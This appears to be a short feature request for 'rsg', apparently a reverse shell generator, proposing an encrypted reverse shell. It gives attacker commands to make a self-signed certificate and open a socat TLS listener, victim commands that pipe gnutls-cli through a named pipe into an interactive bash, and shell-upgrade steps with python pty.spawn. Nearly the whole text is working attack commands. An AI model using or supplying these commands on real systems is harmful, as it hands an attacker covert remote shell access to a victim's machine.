rsg
rsg copied to clipboard
Feature request - SSL/TLS using gnutls-cli on victim
Attacker:
certtool --generate-privkey --outfile gtlsserver.pem
certtool --generate-self-signed --load-privkey gtlsserver.pem --outfile gtlsserver-cert.pem
socat `tty`,raw,echo=0 openssl-listen:8080,reuseaddr,cert=server.pem,verify=0
Victim (ignore first 32 lines):
rm -f /tmp/p ; mkfifo /tmp/p ;
gnutls-cli --debug=0 --insecure localhost:8080 0< /tmp/p | \
( head -n 32 > /dev/null ; bash -i ) 1>/tmp/p 2>&1
Some fixing of terminal is desired within the shell session:
python -c 'import pty; pty.spawn("/bin/bash")'
eval `resize`
reset